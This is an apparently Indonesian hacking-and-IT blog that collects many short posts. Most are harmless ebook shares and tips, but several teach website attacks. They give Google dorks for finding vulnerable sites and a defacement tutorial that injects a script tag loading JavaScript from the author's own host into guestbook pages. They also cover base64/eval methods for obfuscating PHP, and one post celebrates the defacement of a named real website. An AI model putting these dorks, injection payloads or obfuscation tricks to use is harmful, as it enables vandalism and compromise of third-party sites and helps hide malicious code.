belum pada kenal ya sama saya ? ^_^ haha ya saya admin disini yang baru ngepost nih haha .. sebenar sih dari dulu udah mau ngepost cuma gak ada yang postingan yang greget gua bingung mau posting apa ..
nahh dan untuk kali saya akan posting perdana yang berjudul :
" Bypass Tusfiles, Sharebeasth, Solidfiles, etc. "
Assalamualaikum warrohmatullohi wabarakatu :D
ya kali ini saya akan berbagi exploit tentang anu anu site lagi nihh :D hehe "Exploit Priv8 SCR"
ya ampir sama seperti exploit xampp write acces lah :D ..
langsung aja yuk ahh ke tekape :D
biasa kita gunain dork google +++++++++++++++++++++++++++++++++ inurl:config/config.izo +++++++++++++++++++++++++++++++++
tinggal gunain dorknya :D
pilih salah satu gan
saya pilih satu tinggal klik aja nanti akan tampil seperti ini gan :
Isi aja gan sesuai selera :D jika sudah klik hajar ,, liat contoh diatas..
Hai Sobat IT kali ini saya akan berbagi trik menemukan lokasi file deface dimirror
kalian pernah gak berfikir setelah nyubmit ,, kenapa bisa jadi mirror di web itu ?
jawabannya yuk kita liat tutorial dibawah ini >>
submitlah url yang telah kamu deface ke web mirror deafacemet
lalu buka mirrornya contoh :
setelah itu klik kanan tepat diatas frame mirror deface kamu , kemudian view frame source
maka akan jadinya seperti dibawah ini :
Nah coba perhatikan gambar diatas ^^ ada text yang saya blok ,, hapuslah teks tersebut kemudian tekan enter !
maka yang terjadi :
jrenggg jrenggg !! hahaha ..
cukup mudah bukan ^_^
selamat mencoba :v
Assalamaualaikum warrohmatullohi wabarokatu ...
Pada kesempatan kali ini saya akan berbagi trik / tektik deface lagi nihhh haha wahh udah lama .. "Deface Using JS Overlay"
sebelumnya thanks to devilscream a.k.a riswanda yang telah memberi masukannya .. :3
Langsung aja deh yukk ...
Bahan yang kita perlukan adalah : +++++++++++++++++++++++++++++++++++++++++ JS : lihat script http://peluru-cms.cf/c3.js Script deface kalian Hosting pribadi +++++++++++++++++++++++++++++++++++++++++
Pertama ambilah script c3.js diweb saya tadi ,, kemudian siapkan script deface kalian dan hosting kalian
bisa pake hosting gratis nih yang gk punya di http://idhostinger.com daftar aja gratiss ..
Sebelum kalian upload c3.js ,, terlebih dahulu edit edit yang sekiranya harus diedit ...
coba perhatikan gambar dibawah ini :
Nah pada bagian yang dilinkaran merah tersebut ,, itu adalah lokasi script untuk deface kamu ..
http://peluru-cms.cf itu adalah website saya dan saya mengupload JS dan script deface saya disana ,,
Uploadlah JS yang telah kamu edit dan script deface kamu ke hosting website kamu ..
mengerti ??
Lanjut ke bagian klimaxx !!
Gunakan Dork
++++++++++++++++++++++++++++++++++
inurl:/bukutamu.php
++++++++++++++++++++++++++++++++++
Sudah tau kan cara menggunakan dork ?? okeh tinggal pilih pilih website yang sekiranya vuln ,, website yang vuln adalah website yang bisa disisipkan script html
contoh seperti punya saya
Disana saya akan menyisipkan sebuah kode pemanggilan javascript ,,
yap apa sudah punya gambaran ??
Ya sebenarnya saya memanfaatkan kode pemanggilan tersebut untuk membuat halaman saya sisipkan script menjadi FULL DEFACE !!
perhatikan gambar diatas ^^
saya menyisikan script <script src="http://peluru-cms.cf/c3.js" type="text/javascript></script>
lihat pada bagian link tersebut ,, itu adalah lokasi javascript saya berada ,, nantinya script tersebut akan memanggil javascript dan javascript akan memanggil script deface kamuu ... lumayan ribet yah :v haha
nah ini juga bisa digunain untuk edit article diweb admin yang telah kamu masuki ^_^
nahhh saya hanya akan menjelaskan sampai disini selebihnya silahkan deh kalian ulik ulik sendiri ^_^
Terimakasih wassalam ^_^
Halo sobat it ,, kali saya akan berbagi ebook tutorial menggunakan os kali linux .
Tidak seperti windows atau mac os yang berstandar GUI kali linux lebih ke standar commad.
jadi kita perlu mengetahui command command atau perintah perintah untuk mengoprasikan os yang satu ini.
Lalu apa itu kali linux ?
Kali Linux adalah Debian -derived distribusi Linux dirancang untuk forensik digital dan pengujian penetrasi . Hal ini dikelola dan didanai oleh Serangan Keamanan Ltd Mati Aharoni, Devon Kearns dan Raphaël Hertzog adalah pengembang inti. Sumur
Langsung saja deh nih supaya gak penasaran download aja ebooknya.
Hai sobat IT ,, dikesempatan kali ini saya akan berbagi e book html & css lengkap.
buat kalian yang suka ngulik program pasti sudah tidak asing lagi dengan html dan css itu apa ,,
yap . . .
apa sih html dan css itu ?
Hyper Text Markup Language (HTML) adalah sebuah bahasa markah yang digunakan untuk membuat sebuah halaman web, menampilkan berbagai informasi di dalam sebuah penjelajah web Internet dan pemformatan hiperteks sederhana yang ditulis dalam berkas format ASCII agar dapat menghasilkan tampilan wujud yang terintegerasi. Dengan kata lain, berkas yang dibuat dalam perangkat lunak pengolah kata dan disimpan dalam format ASCII normal sehingga menjadi halaman web dengan perintah-perintah HTML. Sumur
Cascading Style Sheet (CSS) merupakan aturan untuk mengendalikan beberapa komponen dalam sebuah web sehingga akan lebih terstruktur dan seragam. CSS bukan merupakan bahasa pemograman.
Hai sobat IT kali ini saya akan share tentang pemograman android :D
Kali pasti udah gak asing lagi dengan kata android ini ya kan ipin :D haha
Apa sih itu android ?
Android (/ˈæn.drɔɪd/; AN-droyd) adalah sistem operasi berbasis Linux yang dirancang untuk perangkat seluler layar sentuh seperti telepon pintar dan komputer tablet. Android awalnya dikembangkan oleh Android, Inc., dengan dukungan finansial dari Google, yang kemudian membelinya pada tahun 2005.[12] Sistem operasi ini dirilis secara resmi pada tahun 2007, bersamaan dengan didirikannya Open Handset Alliance, konsorsium dari perusahaan-perusahaan perangkat keras, perangkat lunak, dan telekomunikasi yang bertujuan untuk memajukan standar terbuka perangkat seluler. Ponsel Android pertama mulai dijual pada bulan Oktober 2008. Sumur
Buat para opreker sangat rekomended nih :D jangan cuma bisa ngopreknya aja coba icip icip deh bikin programnya juga dong :D
joss langsung sedot aja nih ebooknya bro lengkap :D
Haloo sobat IT dihari ini saya khusu share ebook kayak nya :D haha jika tadi saya share ebook ruby
sekarang saya mau share ebook pemograman python :D .
Lalu apa itu python ?
Python adalah bahasa pemrograman interpretatif multiguna dengan filosofi perancangan yang berfokus pada tingkat keterbacaan kode. Python diklaim sebagai bahasa yang menggabungkan kapabilitas, kemampuan, dengan sintaksis kode yang sangat jelas, dan dilengkapi dengan fungsionalitas pustaka standar yang besar serta komprehensif. Sumur
Fitur E- Book
Dasar Python (11 Pembahasan)
Python Dasar (Ridwan Fajar)
Buku Python (PTIK UNM)
Membuat Aplikasi Bisnis dengan Bahasa Python dan MySQL (Owo Sugiono)
Cepat Mahir Python (Hendri -IlmuKomputer)
Byte of Python
Invent with Python
Making Games
Making Games_src (zip)
Python for Dummies
Python Programmer for Absolute Beginner
Halo sobat IT apa kabar :D sudah lama saya tidak posting posting ,,
Kali ini saya akan posting ebook tentang pemograman ruby..
Lalu apa sih itu ruby ? :D
Ruby adalah bahasa pemrograman dinamis berbasis skrip yang berorientasi obyek. Tujuan dari ruby adalah menggabungkan kelebihan dari semua bahasa-bahasa pemrograman skrip yang ada di dunia. Ruby ditulis dengan bahasa pemrograman C dengan kemampuan dasar seperti Perl dan Python.
Sesi 2 : OOP dengan Ruby
-) Advanced OOP in Ruby
-) Instance Variables
-) Accessors
-) Class Variables
-) Class Methods
-) Inheritance
-) Access Control
-) Modules
-) Variable
Sesi 3 : Andvanced Topic
-) Exceptions
-) Anvanced Blocks
-) Classes as Objects
-) Metaprogramming
-) I/O
Sesi 4 : Testing
-) Libraries
-) Instalasi & Menggunakan Gems
-) Bundler
-) Packaging Programs and Libraries for Distribution
-) Testing
-) Unit Testing with Minitest
-) Introduction to TDD
Assalamualaikum warohmatullohi wabarokatu . .
Kali ini saya akan berbagi script membuat portal berita dan CMS sederhana ini menggunakan PHP dan Mysql.
Kita telah mengetahui apa itu CMS (Content Management System) ,, tapi seringkali kita tidak tau system kerja dari script cms yang kita gunakan , itu karena kerumitan bahasannya yang tidak sederhana.
Untuk itu saya share , script cms portal berita sederhana ini dengan database mysql yang sederhana juga.
Jadi kalian akan lebih mudah mempelajarinya dan kalian dapat mengembangkannya sehingga menjadi CMS karya kalian sendiri.
Langsung saja kunjungi web demo / officialnya atau langsung menuju link download scriptnya
Assalamualaikun warromatullohi wabarokatu ,,
Apa kabar sobat IT ,, kali ini saya akan berbagi e-book "Tutorial Typografi Dengan Photosop"
Teknik ini sangat sederhana tetapi hasil yang luar biasa ,, dimana objek menjadi kumpulan dari alphabet yang tak teratur atau biasa disebut Typo ini ,, sehingga menghasilkan seni yang lumayan cukup indah.
Assallamualaikum warohmatullohi wabarokatu sobat IT ,,
kali ini saya akan share mengenai sedikit tentang cryptografi base64 dan hash nya
dari mulai cara membuat crypternya dan meng eval decode sehingga dapat dibaca oleh system
tapi disini saya tidak akan menguak lagi lebih dalam , hanya yang saya fahami saja , karena saya tidak ingin sok tau
tutorial ini tidak berdasarkan referensi dari tutorial manapun hanya sebatas logika saya
langsung aja yuk disimak ,,
1. Crypter
sebelumnya coba perhatikan script dibawah ini
nah coba perhatikan ,, kalo kita perhatikan , encode adalah kebalikan dari decode ,, ingat encode itu merubah data asli ke hash dan decode merubah hash ke data asli / menerjemahkan
encode adalah kebalikan jalur dari decode jika decode nya gzinflare - base64 ,, maka encodenya base64 - gzinflate
nah sudah cukup mudeng bukan sampa disini ? haha
sisanya tinggal ulik ulik lagi deh ,, nih ane kasih script punya ane yang udah lumayan ane ulik2 lagi dan tambahin lagi kombinasi jalurnya
download script : http://www.tusfiles.net/p0m8vw2r8h2q
2. Eval
Nah ini yang sering dipertanyakan para coder nih yang mau encrypt jadi php script,
Fungsi eval itu sendiri untuk decode atau menerjemahkan daripada jalur itu
banyak sekali pertanyaan ,, ko error ya kak , kok gak tampil jadi sebuah program ,, ko kenapa ya ?
nah lebih baik disimak yuk ,, aku kasih beberapa metode ,,
-Metode A
pada dasarnya script php itu dibuka dengan tanda "<?" dan ditutup dengan tanda "?>"
maka demikian pun logikanya kita terapkan pada eval ,
metode ini kita me encript sebuah php tanpa tanda buka tutup ,, jadi misalkan kita hanya encrypt
PHP Code:
echo "asik"; menjadi ZWNobyAiYXNpayI7 (base64)
maka itu belum memakai buka tutup ,, ingat buka tutup harus teliti ,, maka evalnya jadi seperti ini
PHP Code:
<? eval(base64_decode('ZWNobyAiYXNpayI7')); ?>
nah sudah faham metode ini kan ?
-Metode B
metode b ini kita menencrypt dengan script php yang tidak ada tutupnya misalkan hanya : <? echo "asik"; menjadi PD8NCmVjaG8gImFzaWsiOw0K (base64) [/php]
nah pada tanda "?>" itu fungsinya sebagai tutup yang awal , dan tadan ?> tanpa kutip itu adalah tutup untuh hash yang tidak pakai tutup tadi ,
tanda "." dalam php sama halnya tanda + atau tambah ,,
cukup mudeng kan metode ini ? lanjut
-Metode C
pada metode c ini kita mengencrytp script yang lengkap dengan buka tutup nya , misalkan kita encrypt :
tanpa ada ?> lagi di bawah evalnya karena encryptnya tadi kan sudah lengkap buka tutup ,,
metode C ini juga berlaku apabila kamu ecnrypt script html kemudia di jadi kan php evalnya seperti ini , karena tidak bisa scipt html dijadikan script php harus pakai echo lagi itu,
-Metode D
Metode yang satu ini cuma membedakan adanya fungsi "$" sebagai pemanggilan
misalkan kita mengencrypt
PHP Code:
<? echo "asik"; menjadi PD8NCmVjaG8gImFzaWsiOw0K (base64)
lalu perhatikan dibawah ini
$convert = "";
Letak paste encode kita nanti
eval("?>" .base64_decode(""));
Perintah ini berfungsi untuk mendecode atau mengartikan perintah yang ke encode tadi
setelah kita mengetik perintah di atas
kita paste hasil encode kita tadi ke
$convert = “pastekan disini”;
Jadi hasilnya
++++++++++++++++++++++++++++++++++++++++++++++
nahh sampai disini saja beberapa hal tentang crypter base64 , mohon maaf atas segala kekurangannya ,
dan mohon maaf yang sebesar besarnya apabila ditutorial saya ini terdapat sebuah kekeliruan atau kesalahan ,
terimkasih , semoga bermanfaat.
Assalamualaikum sobat IT ,, ketemu lagi sama saya yang ganteng gak ketulungan
Kali ini saya akan berbagi script ecryptor md5 dengan php ,,
Ya seperti yang sudah kalian ketahui md5 adalah sebuah hash untuk menyederhanakan sebuah data kedalam suatu kode ,,
Untuk lebih jelasnya lagi silahkan kunjungi link wikipedia ini Apa Itu MD5 ?
dan kata encrypt itu sendiri mengubah data asli ke dalam suatu kode ,,
jadi bukan untuk mengubah hash kode ke bentuk aslinya ,, ya mungkin ini juga bermanfaat untuk pembelajaran ,, nanti saya akan update lagi untuk decryptornya
langsung aja yuk disimak
Spoiler for script
PHP Code:
<title>Peluru Kertas MD5 Encript</title> <?php//check if the form has been submittedif(isset($_POST['md5me'])) { //MD5 encode the submitted content $md5ed = md5($_POST['md5me']); }?> <p>MD5 Value: <strong><?php echo $md5ed;?></strong></p>
Hay teman teman apa kabar ^_^
Kali ini saya akan sedikit berbagi , ebook tutorial photoshop yang cukup bagus dan unik nih sobat IT ^_^
Sebelumnya sobat IT harus tau dulu apa itu photoshop karena ebook ini tidak mengajarkan dasar dasarnya tentang photoshop , langsung ke pembuatan . ^_^ hehe
Langsung saja deh nih bagi yang mau comot ebooknya ^_^ .
Buka website caster fm untuk daftar ,, langkah pertama perhatiikan
penampakan :
Tinggal pilih , mau yang gratis atau yang pro ,, klik register
Kemudian masukan data2 registernya .
penampakan :
Jika sudah daftar ,, kemudian kamu harus membuka email kamu untuk aktivasi , buka email kamu nanti ada kiriman email berupa link ,, klik saja.
Kemudian langkah selanjutnya ,, login akun untuk setting
Nah perhatikan gambar diatas sebagai contoh ,, jika sudah tinggal save settingnya , kemudian Turn on / shtudown server ada dipojok halaman akun.
Nanti akan diberi akun broadcastnya
penampakan :
Nah setelah itu tinggal kita buka aplikasi Mixxx nya ,, sebelumnya saya tidak perlu menjelaskan cara installnya pasti mudah lah,,
lanjut kesetting server radio yang tadi dikasih ,, klik menu option >> preference
Nah sesauaikan dengan yang diatas pengaturannya ,, tinggal masukin rekaman dan lagu lagu yang mau diputer deh,
So . . . Keep Enjoyy on Air . . .
Hay sobat IT , jumpa lagi dengan saya ^_^ maaf nih jarang update blog karena kesibukan yang saya miliki akhir akhir ini .
Kemarin ada yang request ke official katanya "kak tolong updatin aplikasi buat stabilkan RAM android dong " nah gitu katanya.
Untuk itu tidak ada salahnya saya update ini , meski sebenarnya saya tidak punya android tapi saya mengerti sedikit lah ,, wkwkwkwk
Dengan adanya app ini sobat tidak usah kuatir android sobat mengalami kehabisan Ram yang gejalanya suka jadi lambat, lemot, ngehang, bootlop, diam tanpa ada respon bahkan hp android mati sendiri atau restart sendiri dan lebih parahnya ada notifikasi aplikasi tidak merespon jelas sekali mempengaruhi performa android itu sendiri yang akhirnya kita bosan untuk menggunakan android sehari-hari karena terkendala hp android kita suka ngehang.
Sebenarnya pihak developer sendiri melihat fenomena ini yang banyak menyulitkan pengguna android akhirnya merilis sebuah aplikasi yang berguna untuk menaikkan atau menstabilkan Ram di android dengan cara menggunakan Virtual Ram yang di tanamkan di Memori Eksternal (MMC/SD Card).
Dengan aplikasi ini agan dapat menstabilkan kinerja RAM adro sobat it sehingga android agan lebih fress dan lebih fast .
Note : Untuk menggunakannya sobat harus Me-ROOT android sobat IT
Cari cari deh tutor buat nge-Root nya ^_^ hehe
Rabu , 15/12/2014 Pada pukul 09:00 WIB diketahui Situs Japanese Station yang beralamat di http://japanesestation.com telah disusupi hacker asal Indonesia , dengan Nick CaptSalkus48.
Siapa yang tidak tau situs ini , situs yang cukup terkenal dikalangan pecinta Japanese Style.
Hacker yang sudah tidak asing lagi dengan kode nick CaptSalkus48 yang memang selalu aktif di dalam Tim nya yaitu Indonesia Cyber Freedom (INCEF) itu .Tidak ada hal lain yang dia lakukakan.
Hacker satu ini tidak merusak atau menghapus data pada website japanese station itu , hanya meninggalkan sebuah pesan dengan mengupload sebuah script pada server yaitu http://japanesestation.com/irma.html untuk mirror bisa dilihat di http://mirror-zone.org/mirror/id/152894 didalam script itu tidak ada pesan , penghinaan , hanya beberapa nick dari teman hacker CaptSalkus48 . Berikut isi dari sript itu :
Indonesian Cyber Freedom
Thanks to : ~ Sinkaroid ~ Peluru Kertas ~ Dawn_angel ~ Eitaro attacker ~ Jingklong ~ | Bengkulu Hacker Team ~ JKT48 Cyber Team ~ Indonesia Cyber Army
Berbicara soal keamanan website memang tidak ada yang sempurna , masih saja banyak celah celah yang bisa dimanfaatkan untuk menembus keamanan suatu server, karena yang namanya buatan manusia tidak ada yang sempurna hanya Yang Maha Kuasa lah yang sempurna didunia ini.
Sampai kabar ini tersebar pihak CEO Japanese Station belum memperbaiki systemnya , itu berarti kurangnya perhatian dalam pengurusan server dari pihak CEO situs Japanese Station.